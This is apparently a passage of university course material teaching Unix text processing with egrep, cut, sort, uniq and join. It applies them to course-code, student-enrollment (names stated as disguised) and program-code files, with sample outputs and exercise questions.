    MATH2910 Higher Statistical Computing
    MATH3101 Computational Mathematics
    MATH3301 Advanced Math Computing
    MATH3311 Math Computing for Finance
    MATH3400 Logic & Computability
    MATH3421 Logic and Computability
    MATH3430 Symbolic Computing
    MATH3680 Higher Complex Analysis
    MATH3790 Higher Computat. Combinatorics
    MATH3800 Statistical Computation 1
    MATH3810 Statistical Computation 2
    MATH3821 Stat Modelling & Computing
    MATH3871 Bayesian Inference and Comp
    MATH4003 Maths and Comp Sci Honours F/T
    MATH4004 Maths and Comp Sci Honours P/T
    MATH5009 Comp'l Coursework Thesis FT
    MATH5010 Comp'l Coursework Thesis PT
    MATH5305 Computational Mathematics
    MATH5315 High Perf Numerical Computing
    MATH5335 Comput'l Methods for Finance
    MATH5400 Logic & Computability
    MATH5505 Computational Combinatorics
    MATH5685 Complex Analysis
    MATH5856 Intro to Stats and Stat Comput
    MATH5960 Bayesian Inference & Comput'n
    MATH9315 Topics in Mathematical Computing
    MATS1021 Computing in Materials Science
    MATS1264 Fibre Reinforced Plastic Composi
    MATS3064 Composite Materials
    MATS4005 Composites and Functional Mats
    MATS5342 Comp Modelling & Design
    MATS6110 Computational Materials
    MBAX9131 Leadership in a Complex Enviro
    MECH1500 Computing 1M
    MECH3500 Computing 2M
    MECH3510 Computing Applications in Mech.
    MECH3530 Computing Applcts in Mechanical
    MECH3540 Computational Engineering
    MECH4130 Computer-aided Engineering Desig
    MECH4150 Design & Maintenance of Componen
    MECH4500 Computing 3M
    MECH4620 Computational Fluid Dynamics
    MECH8620 Computational Fluid Dynamics
    MECH9150 Design & Maintenance of Componen
    MECH9420 Composite Materials and Mechan
    MECH9620 Computational Fluid Dynamics
    MEFT5103 Computer Media
    MGMT2106 Comparative Management Systems
    MGMT5050 Teams, Ethics & Comp Adv
    MGMT5802 Comp. Adv. Through People
    MINE0710 Computing 1
    MINE1720 Microcomputers (mining)
    MINE1730 Computer Applications in Mining
    MINE4082 Computational Methods
    MINE4810 Comp Methods in Geomechanics
    MTRN2500 Comp for MTRN
    MTRN3500 Comp Appl in Mechatonic Sys
    MTRN3530 Computing Applcts in Mech.Sys.
    PFST2000 Dance Analysis & Composition 1
    PFST2005 Dance Analysis & Composition 2
    PFST2011 Performance Composition
    PHAR9121 Postmarketing Compliance Meds
    PHCM9471 Comparative H'lth Care Systems
    PHIL5206 AI & Computer Science
    PHIL5207 Ai & Computer Science 2A
    PHYS1601 Comp. Applic'ns in Exp. Sci. 1
    PHYS2001 Mechanics & Computational Phys
    PHYS2020 Computational Physics
    PHYS2120 Mechanics and Computational
    PHYS2601 Computer Applications 2
    PHYS3601 Computer Applications in Instrum
    PHYS3610 Computational Physics
    PHYS3620 Computer Based Signal Processing
    PLAN1061 Computer Literacy
    POLS2016 Concepts in Comparative Pol Cult
    POLS3953 Comparative Politics: Russia
    PSYC3191 Computer Science & Psychology
    PTRL1013 Computing-Petroleum Engineers
    PTRL4013 Well Completion & Stimulation
    PTRL5016 Well Completions & Stimulation
    PTRL6016 Well Completions & Stimulation
    REGS0044 Comp Law in Global Context
    REGS0115 Compliance: Financial Service
    REGS0218 Compliance: Financial Services
    REGS0428 Computer Applications in Linguis
    REGS0453 Multiple Regress. & Stat Comp
    REGS0474 Comparative International Tax
    REGS0633 Comparative Corp & Comm Law
    REGS0638 International Comparative Corp
    REGS0718 Energy Co-Compliance in Bldgs
    REGS3092 Comp Cntrl of Machines & Proc
    REGS3265 Intl and Comparative Ind. Rel.
    REGS3410 Computer Networks
    REGS3873 Introduction To Computer Graphic
    REGS3909 Trade Marks & Unfair Comp
    REGS3948 Competition Law
    REGS4045 Competition Reg. of Mergers
    REGS5618 Comp Integrated Manufacturing
    REGS7726 Composites & Multiphase Polyme
    REGS7908 Service Managing for Comp.Adv.
    SART1608 Digital Composite 1
    SART1681 Multimedia Computing Elective1
    SART1810 Introduction to Computing
    SART2608 Digital Composite 2
    SART2681 Multimedia Computing Elective2
    SART2811 Multimedia Computing Workshop
    SART2835 Composition and Design
    SART3608 Digital Composite 3
    SART3681 Multimedia Computing Elective3
    SART3840 Advanced Multimedia Computing
    SART9725 Intro to Multimedia Computing
    SART9739 Multimedia Computing Elective
    SART9741 Composition and Design
    SDES1106 Design and Computers 1
    SDES1110 Design and Computers 2
    SDES1111 Integrated Design Computing 1
    SDES1211 Integrated Design Computing 2
    SDES1601 Colour,Composition &Typography
    SDES2107 Design and Computers 3
    SDES2115 Design and Computers 2B
    SDES3107 Design and Computers 4
    SDES3173 Advanced Computer Graphics
    SDES4103 Design and Computers 4
    SDES6714 Intro 3D Computer Aided Design
    SLSP2902 Computers and Comm.
    SOCA3314 The Messiah Complex
    SOCI3401 Computer Analysis of Social Data
    SOCI3408 Computer Analysis of Social Data
    SOMA1608 Digital Composite
    SOMA1681 Intro Multimedia Computing
    SOMA1810 Introduction to Computing
    SOMA2402 Tangible Computing
    SOMA2608 Digital Composite 2
    SOMA2681 Advanced Multimedia Computing
    SOMA2811 Multimedia Computing Workshop
    SOMA3415 Compositional Project
    SOMA3608 Digital Composite 3
    SURV1111 Introduction To Computing
    SURV2111 Principles of Computer Processin
    SURV2122 Computer Graphics 1
    SURV3111 Survey Computations
    SURV3231 Geodetic Computations
    SURV4111 Data Analysis & Computing 1
    SURV5111 Data Analysis & Computing 2
    SURV5122 Computer Graphics 2
    SURV6121 Computer Graphics
    TABL1002 Computer Information Systems
    TABL2053 Acct for Complex Struct & Inst
    TABL3044 Comparative Tax Systems
    TABL5544 Comparative Tax Systems
    TEDG1101 Computers in Education
    TEDG1106 Computer-based Resources: Design
    TEDG1107 Managing With Computers in Schoo
    TEDG1112 Computers - Gifted & Talented St
    TEDG1113 Computer Control Technology in E
    TEED1134 Fundamentals of Computing
    TEED2119 Computers & People
    TELE4343 Source Coding and Compression
    TELE9302 Computer Networks
    TEXT2501 Computing Applications
    ZACM3011 Component Design
    ZACM3433 Compressible Flow
    ZACM4020 Computational Structures
    ZACM4031 Compressible Flow
    ZACM4913 Eng App of Comp Fluid Dynamics
    ZBUS2200 Markets and Competition
    ZEIT1101 Computational Problem Solving
    ZEIT1110 Computer Games
    ZEIT2102 Computer Technology
    ZEIT2305 Computer Games
    ZEIT3113 Computer Languages & Algorithm
    ZEIT3304 Computing Proj - Info Sys
    ZEIT3307 Computer Games
    ZEIT4003 Computational Fluid Dynamics
    ZEIT7101 Computational Problem Solving
    ZEIT8020 Computer Network Operations
    ZEIT8028 Computer Forensics
    ZEIT9100 Computer Science Research F/T
    ZEIT9101 Computer Science Research P/T
    ZGEN2300 Computers in Society
    ZGEN2301 Computer Games
    ZHSS8431 Comparative Defence Planning
    ZINT1001 Eng Comp Methods 1
    ZITE1001 Computer Tools for Engineers
    ZITE1101 Intro to Computer Science
    ZITE2101 Computer Languages & Algorithm
    ZITE2102 Computer Technology
    ZITE3101 Computing Proj - Comp Sci
    ZITE3105 Human Computer Interaction
    ZITE3106 Interactive Computer Graphics
    ZITE3113 Computer Languages & Algorithm
    ZITE3211 Microcomputer Interfacing
    ZITE3304 Computing Proj - Info Sys
    ZITE4101 Computer Sci 4 (Comb Hons) F/T
    ZITE4102 Computer Sci 4 (Comb Hon) P/T
    ZITE4103 Computer Science 4 (Hons) F/T
    ZITE4104 Computer Science 4 (Hons) P/T
    ZITE8103 Computer Graphics
    ZITE8104 Computer Security
    ZITE8105 Computer Speech Processing
    ZITE8145 SoftComp
    ZITE9100 Computer Science Research F/T
    ZITE9101 Computer Science Research P/T
    ZPEM3302 Complex Variables
    
    The second one looks better because the data itself isn't transformed, only the internal comparisons.

    If we want to know how many courses have "computing" or "computer" in their title, we have to use egrep, which recognises the alternative operator "|", and wc to count the number of matches. There are a couple of ways to construct the regexp:

    egrep -i 'computer|computing' course_codes | wc
        262    1149    9027
    
    egrep -i 'comput(er|ing)' course_codes | wc
        262    1149    9027
    
    If you don't like the irrelevant word and character counts, use wc -l.

    Some of these 262 matches are CSE offerings, whose course codes begin with COMP, SENG or BINF. Which of the matches were courses offered by other schools?

    Think about it for a moment.... There's no "but not" regexp operator, so instead we construct a composite filter with an extra step to deal with eliminating the CSE courses:

    egrep -i 'computer|computing' course_codes | egrep -v '^(COMP|SENG|BINF)'
    ACSC1600 Computer Science 1
    ACSC1800 Computer Science 1E
    ACSC2015 Interactive Computer Graphics
    ACSC2020 Computer Science Core B2
    ACSC2021 Computer Systems Architectrue 2
    ACSC2107 Computer Languages B
    ACSC2601 Computer Science 2A
    ACSC2602 Computer Science 2B
    ACSC2802 Computer Science 2EE
    ACSC3003 Computer Project
    ACSC3029 Computing Project 3
    ACSC3030 Cryptography & Computer Securi
    ACSC3601 Computer Science 3A
    ACSC3603 Computer Science 3C
    ACSC4191 Computer Science 4 (Hons) F/T
    ACSC7304 Computer Graphics
    ACSC7306 Computer Speech Processing
    ACSC7336 Computer Security
    ACSC8248 Computer Graphics (12 Cpt)
    ACSC9000 Computer Science Research F/T
    ACSC9001 Computer Science Research P/T
    AELE2007 Computer Design
    AELE2508 Microcomputer Interfacing
    AELE3031 Microcomputer Interfacing
    AELE4511 Computer Control Theory
    ANCE8002 Supercomputing Techniques
    ARCH5202 Computer Applications 2
    ARCH5203 Computer Applications 3
    ARCH5220 Computer Graphics Programming 1
    ARCH5221 Computer Graphics Programming 2
    ARCH5223 Computer Applications 2
    ARCH5942 Arctitectural Computing Seminar
    ARCH6201 Architectural Computing 1
    ARCH6205 Architectural Computing 2
    ARCH6214 Architectural Computing 2
    ARCH7204 Design Computing Theory
    ARCH7205 Computer Graphics Programming
    ARTS2301 Computers, Brains & Minds
    ATAX0002 Computer Information Systems
    AVEN1500 Computing for Aviation
    BENV1141 Computers and Information Tech
    BENV1242 Computer-Aided Design
    BENV2405 Computer Graphics Programming
    BIOM9501 Computing for Biomedical Eng
    BLDG2281 Introduction To Computing
    BLDG3282 Computer Apps in Building
    BLDG3482 Computer Aplications in Constr
    CEIC5310 Computing Studies in The Process
    CEIC8310 Computing Studies Proc Ind
    CEIC8335 Adv Computer Methods
    CHEM3640 Computers in Chemistry
    CIVL1015 Computing
    CIVL1106 Computing & Graphics
    COFA2682 Multi-media Computing Unit 3
    COFA3681 Multi-media Computing Elective 1
    COFA5116 Design & Computers
    COFA5216 Design & Computers 1
    COFA5240 Design & Computers 2 Cad
    COFA5241 Design & Computers 2 Graphics
    COFA5338 Design & Computers 3 - Cad
    COFA5339 Design & Computers 3 - Graphic
    COFA8670 Intro To Multi-media Computing
    CVEN1015 Computing
    CVEN1025 Computing
    EDST1492 Computer Skills for Teachers
    EDST4092 Computer Skills for Teachers
    EDST4157 Computing Studies Method 1
    EDST4158 Computing Studies Method 2
    ELEC4432 Computer Control & Instrumenta
    ELEC4632 Computer Control Systems
    ELEC9401 Computer Control Systems 1
    ELEC9402 Computer Control Systems 2
    ELEC9403 Real Time Computing & Control
    ELEC9733 Real Computing and Control
    ENGG1811 Computing for Engineers
    FNDN0301 Computing Studies
    FNDN0302 Computing Studies and Research
    FNDN0311 Computing Studies - T
    FOOD4220 Computer Applications
    FOOD4320 Computer Applications
    FOOD4537 Computing in Food Science
    GEND4201 Design and Computing
    GENE8001 Computer Game Design
    GENM0515 Computers for Professionals
    GENP0515 Computers for Professionals
    GENS2001 The Computer
    GENT0603 The Computer: Impact, Significan
    GENT1003 Computers into the 21st C
    GEOG3161 Computer Mapping & Data Displa
    GEOG3861 Computer Mapping
    GEOG9014 Computer Mapping &Data Display
    GEOG9210 Computer Mapping & Data Displa
    GEOL0300 Computing & Stats for Geol
    GEOL2041 Geological Computing
    GMAT1111 Introduction To Computing
    GMAT2111 Principles of Computer Processin
    GMAT2112 Principles of Computer Processin
    GMAT2122 Computer Graphics 1
    GMAT3122 Computer Graphics 1
    GMAT4111 Data Analysis & Computing 1
    GMAT4112 Data Analysis & Computing 1
    GMAT5111 Data Analysis & Computing 2
    GMAT5112 Data Analysis & Computing 2
    GMAT5122 Computer Graphics 2
    HPSC2610 Computers, Brains & Minds
    HPST2004 Computers, Brains & Minds
    HPST2109 Computers, Brains & Minds
    IDES2121 Introduction To Computing
    IDES3231 Adv Computer Aided Product Des
    IDES5153 Computer Graphic Applications
    IDES5154 Computer Aided Design
    ILAS0232 Computer Prog'mng for Info. Appl
    ILAS0233 Computing Applications in The in
    INFS3607 Distributed Computer Systems
    LAND1131 Introduction To Computer Applica
    LAWS1032 Computer Applications to Law
    LAWS4620 Computer Applications To Law
    LIBS0233 Computer Applications in The Inf
    MANF3500 Computers in Manufacturing 1
    MANF4500 Computers in Manufacturing 2
    MANF8560 Computer Integrated Manufact.
    MANF9500 Computer-aided Progrmg for Numcl
    MANF9560 Computer Integrated Manufact.
    MARK3022 Computer Applications in Marketi
    MATH1061 Introductory Applied Computing
    MATH2301 Mathematical Computing
    MATH2430 Symbolic Computing
    MATH2810 Statistical Computing
    MATH2910 Higher Statistical Computing
    MATH3301 Advanced Math Computing
    MATH3311 Math Computing for Finance
    MATH3430 Symbolic Computing
    MATH3821 Stat Modelling & Computing
    MATH5315 High Perf Numerical Computing
    MATH9315 Topics in Mathematical Computing
    MATS1021 Computing in Materials Science
    MECH1500 Computing 1M
    MECH3500 Computing 2M
    MECH3510 Computing Applications in Mech.
    MECH3530 Computing Applcts in Mechanical
    MECH4130 Computer-aided Engineering Desig
    MECH4500 Computing 3M
    MEFT5103 Computer Media
    MINE0710 Computing 1
    MINE1720 Microcomputers (mining)
    MINE1730 Computer Applications in Mining
    MTRN3530 Computing Applcts in Mech.Sys.
    PHIL5206 AI & Computer Science
    PHIL5207 Ai & Computer Science 2A
    PHYS2601 Computer Applications 2
    PHYS3601 Computer Applications in Instrum
    PHYS3620 Computer Based Signal Processing
    PLAN1061 Computer Literacy
    PSYC3191 Computer Science & Psychology
    PTRL1013 Computing-Petroleum Engineers
    REGS0428 Computer Applications in Linguis
    REGS3410 Computer Networks
    REGS3873 Introduction To Computer Graphic
    SART1681 Multimedia Computing Elective1
    SART1810 Introduction to Computing
    SART2681 Multimedia Computing Elective2
    SART2811 Multimedia Computing Workshop
    SART3681 Multimedia Computing Elective3
    SART3840 Advanced Multimedia Computing
    SART9725 Intro to Multimedia Computing
    SART9739 Multimedia Computing Elective
    SDES1106 Design and Computers 1
    SDES1110 Design and Computers 2
    SDES1111 Integrated Design Computing 1
    SDES1211 Integrated Design Computing 2
    SDES2107 Design and Computers 3
    SDES2115 Design and Computers 2B
    SDES3107 Design and Computers 4
    SDES3173 Advanced Computer Graphics
    SDES4103 Design and Computers 4
    SDES6714 Intro 3D Computer Aided Design
    SLSP2902 Computers and Comm.
    SOCI3401 Computer Analysis of Social Data
    SOCI3408 Computer Analysis of Social Data
    SOMA1681 Intro Multimedia Computing
    SOMA1810 Introduction to Computing
    SOMA2402 Tangible Computing
    SOMA2681 Advanced Multimedia Computing
    SOMA2811 Multimedia Computing Workshop
    SURV1111 Introduction To Computing
    SURV2111 Principles of Computer Processin
    SURV2122 Computer Graphics 1
    SURV4111 Data Analysis & Computing 1
    SURV5111 Data Analysis & Computing 2
    SURV5122 Computer Graphics 2
    SURV6121 Computer Graphics
    TABL1002 Computer Information Systems
    TEDG1101 Computers in Education
    TEDG1106 Computer-based Resources: Design
    TEDG1107 Managing With Computers in Schoo
    TEDG1112 Computers - Gifted & Talented St
    TEDG1113 Computer Control Technology in E
    TEED1134 Fundamentals of Computing
    TEED2119 Computers & People
    TELE9302 Computer Networks
    TEXT2501 Computing Applications
    ZEIT1110 Computer Games
    ZEIT2102 Computer Technology
    ZEIT2305 Computer Games
    ZEIT3113 Computer Languages & Algorithm
    ZEIT3304 Computing Proj - Info Sys
    ZEIT3307 Computer Games
    ZEIT8020 Computer Network Operations
    ZEIT8028 Computer Forensics
    ZEIT9100 Computer Science Research F/T
    ZEIT9101 Computer Science Research P/T
    ZGEN2300 Computers in Society
    ZGEN2301 Computer Games
    ZITE1001 Computer Tools for Engineers
    ZITE1101 Intro to Computer Science
    ZITE2101 Computer Languages & Algorithm
    ZITE2102 Computer Technology
    ZITE3101 Computing Proj - Comp Sci
    ZITE3105 Human Computer Interaction
    ZITE3106 Interactive Computer Graphics
    ZITE3113 Computer Languages & Algorithm
    ZITE3211 Microcomputer Interfacing
    ZITE3304 Computing Proj - Info Sys
    ZITE4101 Computer Sci 4 (Comb Hons) F/T
    ZITE4102 Computer Sci 4 (Comb Hon) P/T
    ZITE4103 Computer Science 4 (Hons) F/T
    ZITE4104 Computer Science 4 (Hons) P/T
    ZITE8103 Computer Graphics
    ZITE8104 Computer Security
    ZITE8105 Computer Speech Processing
    ZITE9100 Computer Science Research F/T
    ZITE9101 Computer Science Research P/T
    
    The last ones are from the Computer Science school at ADFA.
  2. Consider a file called enrollments which contains data about student enrollment in courses. There is one line for each student enrolled in a course:
    ls -l enrollments
    -rw-r--r-- 1 cs2041 cs2041 855297 Oct 16 22:02 enrollments
    
    wc enrollments
      7569  42802 855297 enrollments
    
    head enrollments
    COMP1511|5013566|Xin, Mackenzie Darren                             |3648/2|COMPI1 MTRNAH|071.800|17s2|19910428|M
    COMP9902|5079970|Park, Xue Hannah Vanessa                          |8543  |ELECAH       |079.333|17s2|19900209|F
    COMP1511|5059072|Chung, Michael Jia Tianyu                         |3778/1|COMPCS       |057.250|17s2|19990801|M
    COMP1521|5060774|Lim, Stephanie Lauren                             |3785/1|COMPA1       |000.000|17s2|19890113|F
    COMP1531|5060774|Lim, Stephanie Lauren                             |3785/1|COMPA1       |000.000|17s2|19890113|F
    COMP2521|5060774|Lim, Stephanie Lauren                             |3785/1|COMPA1       |000.000|17s2|19890113|F
    COMP9020|5060538|Bi, Samuel Shiyu                                  |6021  |COMPA1       |078.125|17s2|19911004|M
    COMP9021|5060538|Bi, Samuel Shiyu                                  |6021  |COMPA1       |078.125|17s2|19911004|M
    COMP9902|5072116|Hu, Kai Zhi Patrick                               |3707/1|SENGAH       |070.750|17s2|19930424|M
    COMP1511|5036926|Fang, Rebecca Lauren                              |8543  |COMPCS       |000.000|17s2|20000921|F
    
    The following commands count how many students are enrolled in COMP2041 or COMP9041. The course IDs differ only in one character, so a character class is used instead of alternation.

    The first version below is often preferred because initially you may want to know "how many xxx"; then, having found that out, the next question might be "well, give me a sample of 10 or so of them". Then it's a simple matter of replacing wc by head.

    egrep '^COMP[29]041' enrollments | wc -l
    511
    
    egrep -c '^COMP[29]041' enrollments
    511
    
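    The last field in the enrollments file records the student's gender. This command is intended to count the number of female students enrolled in the courses:
    egrep '^COMP[29]041' enrollments | egrep '|F$' | wc -l
    511
    
    That is the same as the total enrollment count, so the second filter removed nothing. In an extended regexp an unescaped "|" is the alternation operator, and with GNU egrep the pattern '|F$' has an empty alternative that matches every line. Writing the pattern as '\|F$' matches a literal "|" followed by F at the end of the line, which is what was intended.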

    By the way, the two egreps could have been combined into one. How?
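One possible answer, sketched on three invented records rather than the real enrollments file (the sample data and the variable names are assumptions for illustration). The course code is anchored at the start of the line and the gender at the end, so a single regexp can join the two conditions with `.*`. Here `grep -E` is used as the current spelling of egrep, and `\|` matches a literal "|".

```shell
# Invented records in the same |-separated layout as enrollments.
sample=$(mktemp)
cat >"$sample" <<'EOF'
COMP2041|5000001|Example, Alice|3778/1|COMPA1|070.000|17s2|19990101|F
COMP9041|5000002|Example, Bob|8543  |COMPCS|065.000|17s2|19980202|M
COMP1511|5000003|Example, Carol|3707/1|SENGAH|080.000|17s2|19970303|F
EOF

# Two filters: course code at the start, then a literal | and F at the end.
two_step=$(grep -E '^COMP[29]041' "$sample" | grep -E -c '\|F$')

# One filter: the same two conditions joined by .* in a single regexp.
one_step=$(grep -E -c '^COMP[29]041.*\|F$' "$sample")

echo "$two_step $one_step"   # both counts are 1 for this sample
rm -f "$sample"
```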

    This command will give a sorted list of course codes:

    cut -d'|' -f1 enrollments | sort | uniq
    COMP1400
    COMP1511
    COMP1521
    COMP1531
    COMP2041
    COMP2121
    COMP2521
    COMP3151
    COMP3161
    COMP3222
    COMP3331
    COMP3421
    COMP3431
    COMP3511
    COMP3601
    COMP3901
    COMP4121
    COMP4161
    COMP4336
    COMP4418
    COMP4904
    COMP4905
    COMP4920
    COMP4930
    COMP4931
    COMP4941
    COMP6445
    COMP6714
    COMP6733
    COMP6741
    COMP6771
    COMP6845
    COMP9020
    COMP9021
    COMP9024
    COMP9032
    COMP9041
    COMP9151
    COMP9161
    COMP9222
    COMP9242
    COMP9311
    COMP9313
    COMP9321
    COMP9322
    COMP9323
    COMP9331
    COMP9336
    COMP9415
    COMP9418
    COMP9431
    COMP9444
    COMP9511
    COMP9517
    COMP9596
    COMP9900
    COMP9901
    COMP9902
    COMP9945
    
    The student records system known to users as myUNSW is built on top of a large US product known as PeopleSoft (the company was taken over by Oracle in 2004). On a scale of 1 to 10 the quality of the design of this product is about 3. One of its many flaws is its insistence that everybody must have two names, a "Last Name" and a "First Name", neither of which can be empty. To signify that a person has only a single name (common in Sri Lanka, for example), the system stores a dot character in the "First Name" field. The enrollments file shows the data as stored in the system, with a comma and space separating the component names. It has some single-named people (note that the names themselves have been disguised):
    egrep ', \.' enrollments
    COMP1511|5007185|Nguyen, .                                         |3764/1|COMPCS       |000.000|17s2|19861014|M
    COMP3331|5071779|Yuan, .                                           |3785/2|COMPCS       |072.063|17s2|19901016|M
    COMP3511|5071779|Yuan, .                                           |3785/2|COMPCS       |072.063|17s2|19901016|M
    COMP4920|5071779|Yuan, .                                           |3785/2|COMPCS       |072.063|17s2|19901016|M
    COMP9021|5054494|Dang, .                                           |8543  |ELECAH PHYSC1|000.000|17s2|19931117|M
    COMP3421|5072547|Zhou, .                                           |3978/2|COMPA1       |068.167|17s2|19870503|M
    COMP3431|5072547|Zhou, .                                           |3978/2|COMPA1       |068.167|17s2|19870503|M
    COMP3601|5072547|Zhou, .                                           |3978/2|COMPA1       |068.167|17s2|19870503|M
    COMP9901|5065745|Lo, .                                             |8543  |COMPAS COMPIS|082.545|17s2|19981128|M
    COMP9024|5099838|Chen, .                                           |3978/1|COMPCS       |072.500|17s2|19980127|F
    COMP9041|5099838|Chen, .                                           |3978/1|COMPCS       |072.500|17s2|19980127|F
    COMP9321|5099838|Chen, .                                           |3978/1|COMPCS       |072.500|17s2|19980127|F
    COMP9331|5099838|Chen, .                                           |3978/1|COMPCS       |072.500|17s2|19980127|F
    
    What would have happened if we forgot the backslash?
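As a sketch of the answer, on two invented records rather than the real enrollments file: without the backslash the dot matches any character, so the pattern matches every line where a comma and space are followed by anything at all, which is every student with a first name.

```shell
# Invented records: one single-named student, one with a first name.
sample=$(mktemp)
cat >"$sample" <<'EOF'
COMP1511|5000001|Example, .       |3764/1|COMPCS|000.000|17s2|19900101|M
COMP1511|5000002|Example, Alice   |3778/1|COMPA1|070.000|17s2|19990101|F
EOF

escaped=$(grep -E -c ', \.' "$sample")    # literal dot: only the single-named student
unescaped=$(grep -E -c ', .' "$sample")   # any character: both lines match

echo "$escaped $unescaped"   # prints "1 2"
rm -f "$sample"
```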

    If we wanted to know how many different students there were of this type rather than all enrollments, just cut out the second field (student ID) and use uniq. It's not necessary to sort the data in this case only because the data is clustered, that is, all equal values are adjacent although they're not necessarily sorted.

    egrep ', \.' enrollments | cut -d'|' -f2 | uniq | wc
          6       6      48
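The point about clustered data can be checked with a small sketch. The IDs below are just sample values; uniq only collapses adjacent duplicates, so it gives the right answer on clustered input but overcounts when equal values are separated.

```shell
# IDs clustered but not sorted: equal values are adjacent.
clustered=$(printf '%s\n' 5071779 5071779 5054494 5072547 5072547 | uniq | wc -l)

# The same IDs interleaved: uniq alone now overcounts, so sort first.
scattered=$(printf '%s\n' 5071779 5054494 5071779 5072547 5072547 | uniq | wc -l)
sorted=$(printf '%s\n' 5071779 5054494 5071779 5072547 5072547 | sort | uniq | wc -l)

echo $clustered $scattered $sorted   # prints "3 4 3"
```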
    
  3. Now let us turn our attention from students and courses to programs. The enrollments file, as well as linking a student to the courses they're taking, also links them to the program (degree) that they are currently enrolled in. Consider that we want to find out the program codes of the students taking COMP2041. The following pipeline will do this:
    egrep 'COMP[29]041' enrollments | cut -d'|' -f4 | cut -d/ -f1  |sort | uniq
    1540  
    1650  
    2765  
    3133
    3436
    3529
    3554
    3564
    3645
    3647
    3648
    3707
    3710
    3711
    3715
    3725
    3731
    3736
    3761
    3762
    3764
    3767
    3768
    3772
    3778
    3781
    3782
    3784
    3785
    3789
    3946
    3947
    3948
    3956
    3959
    3961
    3962
    3967
    3968
    3969
    3970
    3978
    3979
    3983
    3984
    4515
    5543  
    6001  
    6021  
    7543  
    8009
    8338  
    8543  
    8621  
    
    If we want to know how many students come from each program, ordered from most common program to least common program, try this:
    egrep COMP[29]041 enrollments | cut -d'|' -f4 | cut -d/ -f1 | sort | uniq -c | sort -nr
        175 8543  
         76 3707
         38 3978
         26 3778
         17 1650  
         14 7543  
         11 5543  
         11 3784
         10 3967
          9 3772
          9 3764
          9 3645
          8 3983
          6 3781
          6 3768
          5 6021  
          5 3969
          5 3959
          5 3715
          4 3970
          4 3785
          4 3762
          4 3736
          3 6001  
          3 4515
          3 3946
          3 3782
          3 3767
          3 3725
          2 3956
          2 3948
          2 3789
          2 3761
          2 3711
          2 3648
          2 3647
          1 8621  
          1 8338  
          1 8009
          1 3984
          1 3979
          1 3968
          1 3962
          1 3961
          1 3947
          1 3731
          1 3710
          1 3564
          1 3554
          1 3529
          1 3436
          1 3133
          1 2765  
          1 1540  
    
    Note that a tab is usually inserted between the count and the data, but not all implementations of the uniq command ensure this.
  4. Consider a file called program_codes that contains the code and name of each program offered at UNSW (excluding research programs):

    wc program_codes
     1798  6466 46572 program_codes
    
    head program_codes
    0350 Medicine (Prince Henry/POW)
    0351 Medicine (SWS Clinical School)
    0352 Medicine (St George)
    0353 Medicine (St Vincent's)
    0360 Pathology
    0370 Physiology and Pharmacology
    0375 Rural Health
    0380 Obstetrics and Gynaecology
    0390 Psychiatry
    0400 Surgery (Prince Henry/POW)
    
    We can use this file to give more details of the programs that COMP2041 students are taking, if some users don't want to deal with just program codes.
    egrep COMP[29]041 enrollments | cut -d'|' -f4 | cut -d/ -f1 |sort | uniq | join - program_codes
    1540  Economics
    1650  Computer Science and Eng
    2765  Computer Science and Eng
    3133 Mat Sci and Eng Hons/BiomedEng
    3436 Music
    3529 Commerce/Science
    3554 Commerce (Co-op)
    3564 Economics / Science (Adv Math)
    3645 Computer Engineering
    3647 Bioinformatics
    3648 Software Engineering
    3707 Engineering (Honours)
    3710 Mechanical & Manufacturing Eng
    3711 Mechanical & Manf Eng/Science
    3715 Engineering/Commerce
    3725 Electrical Engineering/Science
    3731 BE ME Electrical Engineering
    3736 BE (Hons) ME Elec Eng
    3761 Adv Math (Hons) / Eng (Hons)
    3762 AdvSci(Hons)/Engineering(Hons)
    3764 Engineering (Hons)/Commerce
    3767 Engineering (Hons) / Science
    3768 Eng (Hons) / MBiomedE
    3772 Engineering(Hons)/Computer Sci
    3946 Adv Maths (Hons)/Computer Sci
    3947 Science / Arts
    3956 Advanced Mathematics (Honours)
    3961 Engineering (Honours) / Arts
    3962 Advanced Science (Honours)
    3967 Commerce / Computer Science
    3968 Computer Science / Arts
    3969 Media Arts (Hons) / Comp Sci
    3970 Science
    3978 Computer Science
    3979 Information Systems
    3983 Science/Computer Science
    3984 Computer Science / Law
    4515 Comp Sci & Eng (Honours)
    5543  Information Technology
    6001  Study Abroad Program
    6021  Exchange Program
    7543  Computing
    8009 Technology and Innovation Mgmt
    8338  Engineering Science
    8543  Information Technology
    8621  Engineering
    
    We can combine the enrollment counts (for both courses) with the program titles to produce a self-descriptive tally. It's even better if it's in decreasing order of popularity, so after joining the tallies with the program titles, re-sort the composite data:
    egrep 'COMP[29]041' enrollments | cut -d'|' -f4 | cut -d/ -f1 |sort | uniq -c | join -1 2 -a 1 - program_codes  | sort -k2rn
    8543 175  Information Technology
    3707 76 Engineering (Honours)
    3978 38 Computer Science
    3778 26
    1650 17  Computer Science and Eng
    7543 14  Computing
    3784 11
    5543 11  Information Technology
    3967 10 Commerce / Computer Science
    3645 9 Computer Engineering
    3764 9 Engineering (Hons)/Commerce
    3772 9 Engineering(Hons)/Computer Sci
    3983 8 Science/Computer Science
    3768 6 Eng (Hons) / MBiomedE
    3781 6
    3715 5 Engineering/Commerce
    3959 5
    3969 5 Media Arts (Hons) / Comp Sci
    6021 5  Exchange Program
    3736 4 BE (Hons) ME Elec Eng
    3762 4 AdvSci(Hons)/Engineering(Hons)
    3785 4
    3970 4 Science
    3725 3 Electrical Engineering/Science
    3767 3 Engineering (Hons) / Science
    3782 3
    3946 3 Adv Maths (Hons)/Computer Sci
    4515 3 Comp Sci & Eng (Honours)
    6001 3  Study Abroad Program
    3647 2 Bioinformatics
    3648 2 Software Engineering
    3711 2 Mechanical & Manf Eng/Science
    3761 2 Adv Math (Hons) / Eng (Hons)
    3789 2
    3948 2
    3956 2 Advanced Mathematics (Honours)
    1540 1  Economics
    2765 1  Computer Science and Eng
    3133 1 Mat Sci and Eng Hons/BiomedEng
    3436 1 Music
    3529 1 Commerce/Science
    3554 1 Commerce (Co-op)
    3564 1 Economics / Science (Adv Math)
    3710 1 Mechanical & Manufacturing Eng
    3731 1 BE ME Electrical Engineering
    3947 1 Science / Arts
    3961 1 Engineering (Honours) / Arts
    3962 1 Advanced Science (Honours)
    3968 1 Computer Science / Arts
    3979 1 Information Systems
    3984 1 Computer Science / Law
    8009 1 Technology and Innovation Mgmt
    8338 1  Engineering Science
    8621 1  Engineering
    
    Note the curious extra space before the title of some programs, such as 8543 and 1650. It took me a while to work it out; can you? (Hint: how are the programs shown in the enrollments file?) Suggest an appropriate change to the pipeline.
